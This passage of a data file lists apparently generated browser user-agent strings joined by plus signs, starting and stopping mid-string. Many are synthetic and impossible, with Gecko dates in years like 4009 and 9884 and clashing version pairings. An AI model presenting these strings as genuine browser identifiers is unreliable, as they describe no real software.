FxiOS/10.4c9576.0 Mobile/72X373 Safari/534.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_6_4; rv:1.9.3.20) Gecko/4009-06-01 19:56:03.743881 Firefox/3.6.4 +Mozilla/5.0 (Android 5.0.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_7 rv:6.0; ha-NG) AppleWebKit/534.26.1 (KHTML, like Gecko) Version/5.0 Safari/534.26.1 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/5.0) +Mozilla/5.0 (Android 5.0.2; Mobile; rv:32.0) Gecko/32.0 Firefox/32.0 +Opera/8.95.(Windows 98; Win 9x 4.90; kok-IN) Presto/2.9.183 Version/11.00 +Mozilla/5.0 (Windows NT 6.1; fi-FI; rv:1.9.0.20) Gecko/3660-02-10 02:04:14.818375 Firefox/3.6.2 +Opera/8.80.(X11; Linux x86_64; ms-MY) Presto/2.9.189 Version/12.00 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) +Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) FxiOS/9.6m4063.0 Mobile/59K613 Safari/531.1 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 4.0; Trident/4.0) +Opera/8.79.(X11; Linux x86_64; ha-NG) Presto/2.9.175 Version/12.00 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/60.0.836.0 Safari/531.2 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.01; Trident/3.0) +Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/533.2 (KHTML, like Gecko) FxiOS/12.3a9193.0 Mobile/31I674 Safari/533.2 +Mozilla/5.0 (Windows; U; Windows NT 5.01) AppleWebKit/535.3.3 (KHTML, like Gecko) Version/4.1 Safari/535.3.3 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 10.0; Trident/3.0) +Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) FxiOS/16.9l2953.0 Mobile/64M660 Safari/535.0 +Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/17.0p9222.0 Mobile/26Y367 Safari/533.0 +Opera/9.93.(X11; Linux i686; cmn-TW) Presto/2.9.169 Version/12.00 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.1) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 4.0; Trident/5.1) +Opera/9.42.(Windows NT 6.0; pap-CW) Presto/2.9.187 Version/11.00 +Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/536.1 (KHTML, like Gecko) CriOS/48.0.818.0 Mobile/41A416 Safari/536.1 +Opera/8.81.(Windows NT 5.1; ca-AD) Presto/2.9.175 Version/10.00 +Mozilla/5.0 (Linux; Android 2.3.6) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/34.0.833.0 Safari/535.0 +Mozilla/5.0 (compatible; MSIE 8.0; Windows 98; Win 9x 4.90; Trident/4.0) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.1) +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_2; rv:1.9.5.20) Gecko/5224-12-10 22:49:38.939102 Firefox/3.8 +Mozilla/5.0 (compatible; MSIE 6.0; Windows 95; Trident/5.1) +Opera/9.53.(Windows NT 6.2; quz-PE) Presto/2.9.184 Version/11.00 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; ka-GE) AppleWebKit/535.30.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B117 Safari/6535.30.7 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1) +Mozilla/5.0 (Linux; Android 7.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/36.0.877.0 Safari/535.1 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2 like Mac OS X; ne-NP) AppleWebKit/532.29.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6532.29.6 +Mozilla/5.0 (Windows NT 4.0; tt-RU; rv:1.9.1.20) Gecko/6903-04-29 04:35:48.694061 Firefox/12.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.1) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_5 rv:4.0; as-IN) AppleWebKit/532.8.3 (KHTML, like Gecko) Version/4.0.1 Safari/532.8.3 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/4.1) +Mozilla/5.0 (Windows NT 5.1; en-PH; rv:1.9.0.20) Gecko/6289-07-28 09:12:24.832748 Firefox/3.6.4 +Mozilla/5.0 (Android 1.0; Mobile; rv:11.0) Gecko/11.0 Firefox/11.0 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_0 like Mac OS X; raj-IN) AppleWebKit/532.16.2 (KHTML, like Gecko) Version/3.0.5 Mobile/8B112 Safari/6532.16.2 +Mozilla/5.0 (Linux; Android 2.3.3) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/57.0.865.0 Safari/531.2 +Mozilla/5.0 (Linux; Android 1.6) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/19.0.893.0 Safari/532.0 +Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) CriOS/43.0.896.0 Mobile/51Y339 Safari/536.0 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.01; Trident/4.0) +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/5.0) +Opera/8.43.(X11; Linux x86_64; sk-SK) Presto/2.9.175 Version/10.00 +Mozilla/5.0 (Windows NT 6.2) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/53.0.815.0 Safari/533.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/3.0) +Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/532.41.7 (KHTML, like Gecko) Version/5.0 Safari/532.41.7 +Opera/8.15.(X11; Linux i686; uz-UZ) Presto/2.9.162 Version/12.00 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_8 rv:3.0; wa-BE) AppleWebKit/531.34.7 (KHTML, like Gecko) Version/4.0.1 Safari/531.34.7 +Opera/8.66.(X11; Linux x86_64; iu-CA) Presto/2.9.174 Version/12.00 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_1; rv:1.9.3.20) Gecko/8881-10-07 21:15:05.528564 Firefox/5.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/44.0.864.0 Safari/533.1 +Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/534.38.3 (KHTML, like Gecko) Version/5.0.1 Safari/534.38.3 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_9 rv:4.0; brx-IN) AppleWebKit/532.31.1 (KHTML, like Gecko) Version/5.0.5 Safari/532.31.1 +Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/22.0.851.0 Mobile/87H684 Safari/532.1 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/533.0 (KHTML, like Gecko) Chrome/16.0.833.0 Safari/533.0 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.1) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1 rv:2.0; ti-ET) AppleWebKit/532.43.4 (KHTML, like Gecko) Version/5.0.3 Safari/532.43.4 +Mozilla/5.0 (iPad; CPU iPad OS 7_1_2 like Mac OS X) AppleWebKit/531.0 (KHTML, like Gecko) CriOS/60.0.848.0 Mobile/11K634 Safari/531.0 +Mozilla/5.0 (Android 1.1; Mobile; rv:57.0) Gecko/57.0 Firefox/57.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_7) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/61.0.825.0 Safari/534.1 +Mozilla/5.0 (Windows 98; af-ZA; rv:1.9.2.20) Gecko/6250-05-25 23:29:04.071106 Firefox/3.8 +Mozilla/5.0 (Windows NT 5.2; mai-IN; rv:1.9.2.20) Gecko/2674-07-31 17:08:13.051685 Firefox/7.0 +Mozilla/5.0 (X11; Linux i686; rv:1.9.6.20) Gecko/2571-12-05 14:55:41.370541 Firefox/3.8 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/35.0.836.0 Safari/535.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3; rv:1.9.4.20) Gecko/8292-08-16 00:07:13.698944 Firefox/10.0 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 4.0; Trident/4.0) +Opera/8.44.(X11; Linux i686; is-IS) Presto/2.9.169 Version/12.00 +Opera/8.26.(X11; Linux i686; da-DK) Presto/2.9.180 Version/11.00 +Mozilla/5.0 (iPad; CPU iPad OS 3_1_3 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/47.0.857.0 Mobile/65I442 Safari/535.0 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/8896-02-11 14:50:00.213470 Firefox/14.0 +Opera/8.61.(Windows NT 5.2; rw-RW) Presto/2.9.162 Version/11.00 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; nr-ZA) AppleWebKit/534.6.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B113 Safari/6534.6.3 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Win 9x 4.90; Trident/5.0) +Opera/9.33.(X11; Linux x86_64; nds-DE) Presto/2.9.160 Version/12.00 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/5.0) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7; rv:1.9.3.20) Gecko/5629-01-10 16:45:47.192932 Firefox/3.6.16 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 4.0; Trident/3.0) +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/534.1 (KHTML, like Gecko) Chrome/29.0.830.0 Safari/534.1 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/31.0.860.0 Safari/535.2 +Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/5373-03-02 04:42:18.551544 Firefox/3.8 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/26.0.880.0 Safari/531.1 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_1 like Mac OS X; bo-IN) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6532.7.2 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/21.0.886.0 Safari/532.1 +Mozilla/5.0 (Android 2.1; Mobile; rv:60.0) Gecko/60.0 Firefox/60.0 +Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/534.1 (KHTML, like Gecko) FxiOS/16.8p5191.0 Mobile/80J584 Safari/534.1 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Trident/3.0) +Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/3.0) +Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.0) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/5.1) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/3.1) +Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_6 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/20.0.865.0 Mobile/39O070 Safari/531.1 +Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/533.25.4 (KHTML, like Gecko) Version/5.0.5 Safari/533.25.4 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_10_7; rv:1.9.4.20) Gecko/7744-04-29 06:57:46.131531 Firefox/3.6.18 +Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_6 like Mac OS X) AppleWebKit/535.0 (KHTML, like Gecko) CriOS/57.0.866.0 Mobile/62F235 Safari/535.0 +Opera/9.41.(Windows NT 6.0; el-CY) Presto/2.9.170 Version/11.00 +Opera/8.32.(Windows NT 6.1; nso-ZA) Presto/2.9.164 Version/11.00 +Mozilla/5.0 (Linux; Android 3.2.6) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/58.0.819.0 Safari/535.2 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_1 like Mac OS X; mi-NZ) AppleWebKit/533.50.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6533.50.2 +Mozilla/5.0 (Linux; Android 4.0.4) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/17.0.804.0 Safari/532.1 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/4.1) +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/3.0) +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 4.0; Trident/3.0) +Mozilla/5.0 (Windows NT 5.2) AppleWebKit/536.2 (KHTML, like Gecko) Chrome/20.0.819.0 Safari/536.2 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.1) +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; Trident/5.1) +Mozilla/5.0 (Linux; Android 8.0.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/43.0.837.0 Safari/535.1 +Mozilla/5.0 (X11; Linux x86_64; rv:1.9.5.20) Gecko/9095-12-05 03:01:15.807526 Firefox/3.6.5 +Opera/8.36.(X11; Linux i686; rw-RW) Presto/2.9.167 Version/11.00 +Mozilla/5.0 (iPad; CPU iPad OS 5_1_1 like Mac OS X) AppleWebKit/533.2 (KHTML, like Gecko) CriOS/28.0.813.0 Mobile/99E916 Safari/533.2 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2 rv:6.0; is-IS) AppleWebKit/535.27.4 (KHTML, like Gecko) Version/5.0.2 Safari/535.27.4 +Mozilla/5.0 (Windows NT 5.0; wa-BE; rv:1.9.1.20) Gecko/8378-03-14 18:18:53.065826 Firefox/3.6.3 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0 rv:2.0; shs-CA) AppleWebKit/532.29.3 (KHTML, like Gecko) Version/5.0.2 Safari/532.29.3 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 10.0; Trident/5.1) +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_7 rv:6.0; hne-IN) AppleWebKit/534.36.3 (KHTML, like Gecko) Version/4.1 Safari/534.36.3 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_3 like Mac OS X; kw-GB) AppleWebKit/535.50.7 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6535.50.7 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.1) +Opera/9.91.(X11; Linux x86_64; ig-NG) Presto/2.9.165 Version/11.00 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Win 9x 4.90; Trident/5.0) +Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_5 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/13.5d4109.0 Mobile/41G315 Safari/533.0 +Opera/9.22.(X11; Linux i686; ast-ES) Presto/2.9.164 Version/10.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1) +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; ko-KR) AppleWebKit/533.6.7 (KHTML, like Gecko) Version/3.0.5 Mobile/8B114 Safari/6533.6.7 +Mozilla/5.0 (Linux; Android 4.0.1) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/55.0.807.0 Safari/532.1 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Win 9x 4.90; Trident/5.0) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.2 (KHTML, like Gecko) Chrome/63.0.862.0 Safari/531.2 +Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/3273-04-03 20:44:32.206963 Firefox/3.6.19 +Mozilla/5.0 (Windows NT 5.1) AppleWebKit/533.1 (KHTML, like Gecko) Chrome/31.0.814.0 Safari/533.1 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/3.0) +Mozilla/5.0 (Windows NT 5.01; br-FR; rv:1.9.0.20) Gecko/8377-05-14 13:18:27.463898 Firefox/3.8 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.1) +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_9_8) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/61.0.874.0 Safari/535.0 +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3 like Mac OS X; ca-AD) AppleWebKit/531.20.5 (KHTML, like Gecko) Version/3.0.5 Mobile/8B111 Safari/6531.20.5 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_7_7 rv:4.0; gez-ER) AppleWebKit/533.46.4 (KHTML, like Gecko) Version/5.1 Safari/533.46.4 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1) +Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/57.0.863.0 Mobile/80K810 Safari/531.1 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/38.0.825.0 Safari/534.2 +Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_4 like Mac OS X) AppleWebKit/532.2 (KHTML, like Gecko) CriOS/14.0.841.0 Mobile/09K263 Safari/532.2 +Opera/9.72.(Windows NT 5.01; lt-LT) Presto/2.9.174 Version/12.00 +Mozilla/5.0 (iPhone; CPU iPhone OS 4_2_1 like Mac OS X) AppleWebKit/531.2 (KHTML, like Gecko) CriOS/20.0.819.0 Mobile/71O426 Safari/531.2 +Mozilla/5.0 (iPad; CPU iPad OS 14_2_1 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/47.0.837.0 Mobile/39U668 Safari/531.1 +Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/534.3.1 (KHTML, like Gecko) Version/4.1 Safari/534.3.1 +Mozilla/5.0 (Windows CE; hr-HR; rv:1.9.1.20) Gecko/9884-03-01 07:01:34.195435 Firefox/3.6.15 +Mozilla/5.0 (Android 4.1; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_11_3 rv:6.0; lv-LV) AppleWebKit/535.42.2 (KHTML, like Gecko) Version/5.0.5 Safari/535.42.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_8_1 rv:5.0; the-NP) AppleWebKit/535.5.2 (KHTML, like Gecko) Version/4.1 Safari/535.5.2 +Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_6 like Mac OS X) AppleWebKit/534.0 (KHTML, like Gecko) FxiOS/16.2o2817.0 Mobile/52K514 Safari/534.0 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 10.0; Trident/4.1) +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0) +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_9_0; rv:1.9.4.20) Gecko/5337-09-10 10:05:58.112091 Firefox/3.8 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2; rv:1.9.2.20) Gecko/7377-07-07 01:16:09.369598 Firefox/7.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.1) +Mozilla/5.0 (Linux; Android 3.2.6) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/34.0.878.0 Safari/534.2 +Mozilla/5.0 (iPad; CPU iPad OS 9_3_5 like Mac OS X) AppleWebKit/532.2 (KHTML, like Gecko) FxiOS/15.1u3908.0 Mobile/60O611 Safari/532.2 +Opera/8.27.(Windows NT 6.2; mt-MT) Presto/2.9.184 Version/11.00 +Opera/8.68.(Windows NT 5.0; nan-TW) Presto/2.9.172 Version/10.00 +Mozilla/5.0 (Linux; Android 2.0.1) AppleWebKit/536.1 (KHTML, like Gecko) Chrome/48.0.860.0 Safari/536.1 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.1) +Opera/8.80.(Windows CE; ks-IN) Presto/2.9.172 Version/10.00 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/4.0) +Mozilla/5.0 (compatible; MSIE 7.0; Windows CE; Trident/4.0) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4; rv:1.9.5.20) Gecko/6898-06-01 03:15:13.466919 Firefox/3.8 +Opera/9.90.(Windows 95; mhr-RU) Presto/2.9.172 Version/10.00 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_12_8 rv:3.0; ga-IE) AppleWebKit/534.40.2 (KHTML, like Gecko) Version/4.1 Safari/534.40.2 +Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/47.0.866.0 Safari/535.2 +Mozilla/5.0 (compatible; MSIE 9.0; Windows 98; Win 9x 4.90; Trident/3.1) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_6) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/58.0.860.0 Safari/531.0 +Opera/9.45.(Windows CE; or-IN) Presto/2.9.169 Version/10.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.0; Trident/3.1) +Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.0) +Opera/9.42.(Windows 95; tn-ZA) Presto/2.9.168 Version/12.00 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/4.1) +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; lv-LV) AppleWebKit/531.32.1 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.32.1 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.1; Trident/4.0) +Opera/9.98.(Windows NT 10.0; kok-IN) Presto/2.9.168 Version/11.00 +Opera/9.34.(Windows 98; ug-CN) Presto/2.9.167 Version/10.00 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/50.0.841.0 Safari/531.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/63.0.836.0 Safari/532.1 +Mozilla/5.0 (Android 6.0.1; Mobile; rv:20.0) Gecko/20.0 Firefox/20.0 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.2; Trident/3.0) +Mozilla/5.0 (compatible; MSIE 5.0; Windows CE; Trident/3.1) +Mozilla/5.0 (iPod; U; CPU iPhone OS 4_0 like Mac OS X; ru-RU) AppleWebKit/532.47.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6532.47.5 +Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/536.0 (KHTML, like Gecko) CriOS/60.0.887.0 Mobile/28M822 Safari/536.0 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_6; rv:1.9.6.20) Gecko/4606-09-25 00:59:21.936157 Firefox/3.6.1 +Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.01; Trident/3.1) +Mozilla/5.0 (Android 3.2.2; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0 +Opera/9.15.(Windows 98; brx-IN) Presto/2.9.178 Version/11.00 +Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/3.0) +Mozilla/5.0 (X11; Linux i686) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/47.0.872.0 Safari/532.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_2; rv:1.9.6.20) Gecko/3674-05-10 21:29:13.869736 Firefox/3.6.3 +Opera/8.98.(Windows NT 4.0; so-ET) Presto/2.9.189 Version/10.00 +Opera/8.47.(X11; Linux i686; id-ID) Presto/2.9.189 Version/10.00 +Mozilla/5.0 (X11; Linux i686) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/52.0.882.0 Safari/533.2 +Mozilla/5.0 (iPod; U; CPU iPhone OS 3_2 like Mac OS X; iw-IL) AppleWebKit/533.45.5 (KHTML, like Gecko) Version/3.0.5 Mobile/8B114 Safari/6533.45.5 +Mozilla/5.0 (compatible; MSIE 7.0; Windows 98; Trident/4.1) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_6_7 rv:6.0; yo-NG) AppleWebKit/535.14.2 (KHTML, like Gecko) Version/5.0.1 Safari/535.14.2 +Mozilla/5.0 (compatible; MSIE 8.0; Windows CE; Trident/5.0) +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.01; Trident/5.1) +Mozilla/5.0 (Windows NT 5.1; hy-AM; rv:1.9.2.20) Gecko/2132-02-01 16:05:29.625677 Firefox/3.8 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_9 rv:6.0; mk-MK) AppleWebKit/532.23.2 (KHTML, like Gecko) Version/4.0.3 Safari/532.23.2 +Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/3.0) +Mozilla/5.0 (iPad; CPU iPad OS 12_4_8 like Mac OS X) AppleWebKit/531.1 (KHTML, like Gecko) CriOS/56.0.831.0 Mobile/87U867 Safari/531.1 +Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/3.0) +Opera/9.26.(Windows NT 10.0; km-KH) Presto/2.9.184 Version/10.00 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sat-IN) AppleWebKit/535.35.3 (KHTML, like Gecko) Version/5.0 Safari/535.35.3 +Opera/8.93.(X11; Linux x86_64; fy-DE) Presto/2.9.176 Version/11.00 +Opera/8.11.(Windows CE; szl-PL) Presto/2.9.173 Version/10.00 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.1 (KHTML, like Gecko) Chrome/37.0.823.0 Safari/531.1 +Mozilla/5.0 (iPad; CPU iPad OS 10_3_3 like Mac OS X) AppleWebKit/532.1 (KHTML, like Gecko) CriOS/39.0.810.0 Mobile/53P339 Safari/532.1 +Opera/9.52.(X11; Linux x86_64; wal-ET) Presto/2.9.185 Version/10.00 +Opera/9.77.(X11; Linux i686; hsb-DE) Presto/2.9.185 Version/11.00 +Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.10.2 (KHTML, like Gecko) Version/5.0.3 Safari/531.10.2 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_10_1 rv:5.0; sw-TZ) AppleWebKit/533.31.5 (KHTML, like Gecko) Version/5.1 Safari/533.31.5 +Mozilla/5.0 (iPad; CPU iPad OS 14_2 like Mac OS X) AppleWebKit/533.0 (KHTML, like Gecko) FxiOS/15.6h8555.0 Mobile/62L194 Safari/533.0 +Mozilla/5.0 (compatible; MSIE 8.0; Windows 95; Trident/4.1) +Mozilla/5.0 (Windows NT 6.0; fr-LU; rv:1.9.0.20) Gecko/7089-04-04 09:16:27.313293 Firefox/3.8 +Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/9395-01-17 23:40:43.634399 Firefox/7.0 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/4.1) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/531.0 (KHTML, like Gecko) Chrome/13.0.851.0 Safari/531.0 +Mozilla/5.0 (compatible; MSIE 6.0; Windows CE; Trident/4.0) +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7 rv:6.0; de-AT) AppleWebKit/533.6.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.6.1 +Mozilla/5.0 (Macintosh; PPC Mac OS X 10_5_4 rv:3.0; kn-IN) AppleWebKit/531.29.2 (KHTML, like Gecko) Version/4.0.3 Safari/531.29.2 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.2; Trident/3.0) +Mozilla/5.0 (Android 7.0; Mobile; rv:68.0) Gecko/68.0 Firefox/68.0 +Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/3.1) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_11_6) AppleWebKit/535.0 (KHTML, like Gecko) Chrome/54.0.807.0 Safari/535.0 +Opera/9.53.(X11; Linux x86_64; wo-SN) Presto/2.9.162 Version/11.00 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_12_7) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/44.0.884.0 Safari/534.2 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) +Mozilla/5.0 (Windows NT 10.0; nl-AW; rv:1.9.2.20) Gecko/4351-12-09 06:13:35.937759 Firefox/3.8 +Mozilla/5.0 (Windows NT 6.2; ml-IN; rv:1.9.0.20) Gecko/7087-07-20 02:56:05.086975 Firefox/3.6.1 +Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_6 like Mac 